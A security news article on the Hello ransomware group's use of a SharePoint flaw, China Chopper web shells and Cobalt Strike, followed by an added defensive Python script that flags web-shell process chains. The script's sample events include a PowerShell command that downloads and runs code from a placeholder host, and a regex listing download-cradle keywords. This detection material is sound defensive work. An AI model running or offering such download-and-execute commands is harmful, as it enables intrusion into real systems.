Researchers on Tuesday found that the Hello ransomware group (aka WickrMe) has been using a Microsoft SharePoint vulnerability and a China Chopper web shell to launch ransomware attacks.

In a blog posted by Trend Micro, the researchers reported that the attackers abuse a Cobalt Strike beacon to launch the ransomware payload. The researchers believe the China Chopper web shell was used in a likely attempt to circumvent detection by known samples.

Microsoft released the advisory on the SharePoint vulnerability (CVE-2019-0604) and patched the gap back in 2019. Since the first prominent attacks abusing it in 2020, exploitation of the vulnerability has continued to make the news.

The researchers said the exploit and China Chopper web shells have been observed together across varying attack routines. That raises the question of whether the combination of the two tools indicates a certain level of access among the cybercriminals using them, or whether more parties are involved and capable of buying access from several sources.

“It’s also worth noting that two years later, the continued abuse of the vulnerability strongly implies that a huge number of companies still have not patched the gap,” the researchers said.

Chris Morales, chief information security officer at Netenrich, found it amazing that, for all the machine learning behavior technology and attack frameworks the security industry likes to talk about, attackers can still win by using a simple little command-line web shell that has been around almost a decade.

“China Chopper was used in the Equifax breach years after it was a known technique,” Morales said. “I am sure vendors will pop up claiming to be able to stop the use of China Chopper. That might be true, yet here we are with variants still in use.”

While it’s a new attack vector, the delivery mechanism the attackers employed isn’t, said Charles Everette, director of customer success at Deep Instinct.

Everette said the technique leverages arbitrary code execution (ACE), a form of remote code injection, which then commonly falls back to more “normal” and archaic means: running scripts. “In our experience, we have seen that the web shell is a glorified way to execute a script (commonly PowerShell) which reaches out in an attempt to pull down the other malicious code like CobaltStrike beacon,” Everette said.
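As an added example (not code from this article, Trend Micro, or the vendors quoted), here is a small Python triage routine for the process chain Everette describes: an IIS worker process hosting the web shell spawns PowerShell or cmd, whose command line reaches out to fetch more code. It assumes Sysmon-style process-creation fields (ParentImage, Image, CommandLine) and runs over constructed sample events.

```python
# Added example: score process-creation events for a web-shell-style chain
# (IIS worker -> command interpreter -> download cradle). Field names follow
# the Sysmon EventID 1 convention (an assumption); sample events are constructed.
import re
from pathlib import PureWindowsPath

IIS_WORKER = "w3wp.exe"
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Argument fragments typical of a script that "reaches out" for a second stage.
CRADLE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|"
                    r"net\.webclient|-enc(odedcommand)?\b|bitsadmin|certutil", re.I)

def _base(path):
    # File name only, lower-cased, so full Windows paths compare cleanly.
    return PureWindowsPath(path).name.lower()

def classify(event):
    """Return (score 0-3, reasons). 0 means nothing web-shell-like was seen."""
    reasons = []
    parent, image = _base(event.get("ParentImage", "")), _base(event.get("Image", ""))
    if parent != IIS_WORKER:
        return 0, reasons
    reasons.append("parent is IIS worker " + IIS_WORKER)  # alone: weak (ASP.NET compiles)
    if image in SHELLS:
        reasons.append(f"IIS worker spawned interpreter {image}")
    if CRADLE.search(event.get("CommandLine", "")):
        reasons.append("command line contains a download/encoding cradle")
    return len(reasons), reasons

def triage(events, threshold=2):
    """Return events whose score reaches the threshold, highest score first."""
    hits = []
    for ev in events:
        score, reasons = classify(ev)
        if score >= threshold:
            hits.append({"score": score, "reasons": reasons, "event": ev})
    return sorted(hits, key=lambda h: -h["score"])

SAMPLE_EVENTS = [  # constructed, not real telemetry
    {"ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://beacon.invalid/stage')\""},
    {"ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd /c whoami"},
    {"ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",  # benign ASP.NET compile
     "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "CommandLine": "csc.exe /noconfig /fullpaths"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -c Get-Process"},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["score"], "; ".join(hit["reasons"]))
```

The threshold of 2 keeps w3wp.exe launching the .NET compiler (a normal SharePoint/ASP.NET event) out of the hits while still flagging an interpreter spawned from the worker even without a cradle in its arguments.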